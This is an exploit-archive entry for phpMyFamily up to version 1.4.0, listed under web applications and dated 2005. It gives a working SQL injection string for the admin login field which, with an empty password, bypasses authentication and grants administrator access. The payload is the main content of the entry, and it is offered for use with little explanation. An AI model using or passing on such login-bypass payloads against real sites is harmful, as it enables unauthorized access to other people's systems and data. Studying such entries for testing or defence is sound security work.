phpMyFamily <= 1.4.0 Admin Bypass SQL Injection

2005-03-21T00:00:00
ID 1337DAY-ID-87
Type zdt
Reporter kre0n
Modified 2005-03-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================
phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
===============================================




# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)




#  0day.today [2018-02-20]  #